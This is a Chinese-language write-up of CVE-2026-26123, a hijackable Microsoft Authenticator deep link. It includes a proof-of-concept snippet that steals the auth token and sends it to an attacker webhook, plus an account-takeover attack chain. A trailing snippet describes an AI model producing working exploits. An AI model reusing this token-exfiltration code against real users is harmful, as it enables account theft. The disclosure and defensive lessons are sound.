【CVE-2026-26123】微软身份认证器 DeepLink 漏洞
微软身份验证器漏洞剖析:一个被“遗弃”的深层链接如何导致账户全面失守
安全领域时常上演这样的故事:最坚固的堡垒,往往从一道无人看管的侧门被攻破。近期一个已被编号为CVE-2026-26123的漏洞,正是这样一个典型案例。该漏洞已得到缓解,并经由负责任披露流程提交至微软安全响应中心。
免费影视、动漫、音乐、游戏、小说资源长期稳定更新! 👉 点此立即查看 👈
问题的核心,出在微软身份验证器中一个用于安全引导用户登录或启用双因素认证的ms-msa://深层链接上。这个链接本身并未被应用正确声明。
正是这一看似技术性的疏忽,酿成了一场“完美风暴”:任何恶意应用都可以轻松拦截其中传递的身份验证令牌,最终导致攻击者能完全接管用户账户——包括双因素认证、密码要求在内的所有安全防护,在此刻形同虚设。
一、背景设定:当便利遭遇灾难
不妨设想一个再常见不过的场景:你正在手机上配置微软身份验证器。按照流程,微软的网页界面生成了一个二维码。你自然而然地拿出手机,用系统自带的摄像头扫描它,然后点击屏幕上弹出的“打开链接”……就在这一瞬间,你的账户控制权可能已经拱手让人。
最可怕的是,整个过程天衣无缝,你对此将毫无察觉。
二、深度链接灾难剖析
1. 什么是深层链接?
简单来说,Android的深层链接功能,允许用户从一个链接(可能来自网页、搜索结果或通知)被直接带入特定应用的内部页面。
你可以把这些深层链接理解为具有专属“暗号”的URL,专门用来唤醒对应的应用。日常生活中随处可见:
spotify://track/... 会打开Spotify播放歌曲;uber:// 能直接启动Uber叫车界面;而 ms-msa:// —— 本应打开微软身份验证器。
请注意,这里的关键词是“本应”。
2. 漏洞:一个数字遗弃案例
当微软身份验证器为账户设置生成二维码时,它会创造出类似下面这样的深层链接:
ms-msa://code=M.C544_BL2.2.U.60e61ddd-1d08-127d-d783-bda9b7v&uaid=88498cfad78b4669aaec4b7a1c8&expires=3964722534这个链接里携带的令牌,堪称“数字黄金”。它是能绕开所有防线——双因素认证、密码、安全问题——的直接身份验证凭证,无异于一把万能钥匙。
那么,离谱的事情来了:微软身份验证器自身,竟然没有“认领”这个本该属于它的深层链接。
这意味着,当这个链接通过以下几种最常见的方式被触发时:
- 手机原生二维码扫描器
- 网页中的直接点击
- ADB命令发送的隐式意图
结果是什么?错误。应用甚至不会启动。用户点击“打开链接”后,被启动的很可能是攻击者预先埋设的恶意应用。
3. 利用:深层链接劫持入门
由于正主“抛弃”了自家的链接,任何应用都可以宣告对这个链接的所有权。没有竞争,用户也不会收到“请选择用哪个应用打开”的提示。恶意应用默认成为赢家。
经验证,这一情况在最新的Android和iOS系统,以及当时最新的微软身份验证器版本上均存在。
4. 构建“伪造身份验证器”
打造一个用于演示的概念验证应用,简单到几乎令人尴尬:
步骤1:注册被遗弃的深层链接
只需在恶意应用的配置文件中声明如下意图过滤器:
步骤2:提取并外传令牌
在应用启动后,几行代码就能截获关键信息:
Intent intent = getIntent();
Uri data = intent.getData();
String token = data.getQueryParameter("code");
// 将令牌发送到攻击者控制的服务器
sendToWebhook(token);
步骤3:获利
凭借窃取到的令牌,攻击者几乎可以为所欲为:
- 直接通过身份验证器生成有效的双因素认证代码
- 无需密码即可登录受害者的微软账户
- 获得对账户的完全访问权限
可能因此沦陷的服务列表长得吓人:电子邮件、Office全家桶、Microsoft Teams、OneDrive、Skype、Outlook等等。
5. 攻击链
整个攻击流程可以清晰还原:
- 受害者访问微软登录页面。
- 页面生成包含
ms-msa://深层链接的二维码。 - 受害者使用手机原生摄像头扫描(这是标准操作流程)。
- 手机弹出“打开链接”提示。
- 恶意应用无声拦截——真正的微软身份验证器根本没有出现。
- 令牌被发送至攻击者的服务器。
- 攻击者使用令牌,成功登录。
三、影响:完整的账户接管
这绝非纸上谈兵的理论漏洞,其实际影响极为严重:
- 范围极广:所有使用微软账户的服务均暴露在风险之下。
- 防护尽失:双因素认证、密码、安全警报等层层防护被一并绕过。
- 极难察觉:攻击过程完全沉默,受害者收不到任何异常通知。
更危险的是,该攻击所需的用户交互极少(仅是扫描二维码这个被鼓励的正规操作),且恶意应用除了基础的网络访问权限外,无需申请任何可疑权限,极容易通过应用商店审核。
四、修复措施:正确实施应用链接
解决方案在技术上并不复杂:正确实施并验证Android应用链接即可。应用链接通过关联网站域名,能够确保特定的URL只能由指定的应用打开,从而从根本上杜绝此类劫持。
五、对安全工程师和开发者的教训
这个案例给所有人敲响了警钟:必须定期审计应用中的所有深层链接,务必为关键链接实施应用链接验证。身份验证流程值得投入最高级别的安全审查。道理很明白:你可以打造世界上最坚固的锁,但如果把钥匙随手放在门垫下面,一切防护都是徒劳。
看,关键而简单的漏洞,往往就藏在这些最基础的地方。
六、时间线与披露
此漏洞已获得CVE编号认可,并已得到微软的修复缓解。整个概念验证仅需网络权限,这使其隐蔽性和危险性尤为突出。
建议所有用户将微软身份验证器更新至最新版本,以确保安全。
原文参考:https://khaledsec.medium.com/e0409a920a02?sk=df506976e7c2d15fd29e70725873f6e2
相关攻略
模型能力显著升级 与Opus 4 6等前辈相比,Claude Mythos预览版实现了一次关键跨越。过去,模型或许能识别出漏洞的“病灶”,但要将其转化为精准的“手术刀”——也就是有效的攻击载荷——往往力有不逮。现在,局面不同了。在开源软件的内部测试中,新模型成功对10个完全打齐补丁的目标,完成了完整
微软身份验证器漏洞剖析:一个被“遗弃”的深层链接如何导致账户全面失守 安全领域时常上演这样的故事:最坚固的堡垒,往往从一道无人看管的侧门被攻破。近期一个已被编号为CVE-2026-26123的漏洞,正是这样一个典型案例。该漏洞已得到缓解,并经由负责任披露流程提交至微软安全响应中心。 问题的核心,出在
安全研究员Hung Nguyen的发现,再次为我们敲响了警钟:应用程序在处理那些看似无害的嵌入式文件指令时,暗藏的风险是持续且真实的。 最近,开发者群体中普及率极高的文本编辑器Vim,就曝出了一个足以令人心惊的高危漏洞。简单来说,攻击者只需精心构造一个文件,一旦有用户用存在漏洞的Vim版本将其打开,
Anthropic的神秘“玻璃之翼”:神话级模型与它的闭门测试 就在今天,Anthropic正式揭晓了一项名为“Project Glasswing”(玻璃之翼项目)的计划。这个计划的启动,直接源于他们训练出了一个堪称“神话级”的全新模型——Claude Mythos Preview。没错,这正是前两
该漏洞编号为(CVE-2026-5281),是Dawn Chrome跨平台GPU抽象层(用于实现WebGPU)中的释放后使用(use-after-free)漏洞。 谷歌已为其Chrome浏览器发布紧
热门专题
热门推荐
Lemonaid是什么 如果你正为音乐创作寻找得力助手,那么Lemonaid很可能就是答案。它是一款专门面向专业音乐人打造的AI音乐生成工具,核心能力在于自主生成包含完整旋律、和声与节奏的乐曲。无论是想要一段氛围感十足的背景音乐,还是为具体场景定制配乐,它都能提供高度逼真且质量上乘的作品。工具提供了
苹果也要出折叠屏,传闻已经有几年了,从目前供应链、分析师与知名爆料者释放的信息来看,这款与市面大折都不一样的阔折叠似乎已经蓄势待发,大概率今年下半年就要正式面市。今天我们就来为大家汇总一波,没准儿就有你想知道的消息。 关于苹果折叠屏手机的传闻,已经流传了好几年。如今,综合供应链、分析师以及各路知名爆
《刺客信条:黑旗重制版》官宣之际,这款新海盗游戏为何能抢先赢得玩家口碑? 当游戏界的焦点都集中在《刺客信条:黑旗重制版》的正式公布时,一款名为《风启之旅》(Windrose)的开放世界海盗生存建造游戏,却凭借其过硬的品质与独特的玩法融合,悄然在玩家社区中掀起热议。这款由乌兹别克斯坦团队Kraken
产品介绍 提到云端智能视频创作,腾讯智影是一个绕不开的名字。这款由腾讯推出的平台,本质上是一个一站式的在线视频工厂,集成了从素材挖掘、剪辑、渲染到最终发布的全链路功能,旨在为用户提供全方位的视频创作解决方案。更吸引人的是,它不仅免费开放,还深度整合了多项前沿AI技术,目标很明确:让视频化表达这件事,
《王者荣耀世界》线下活动风波:合影互动引争议,职业素养与网络舆论深度探讨 近日,《王者荣耀世界》的一场线下玩家见面会,因台上一次短暂的合影互动,意外成为全网热议的焦点。活动中,一位男粉丝上台与角色扮演者(Coser)合影时,主动做出比心手势以示友好,却未得到身旁Coser的任何回应。男生举着手势在原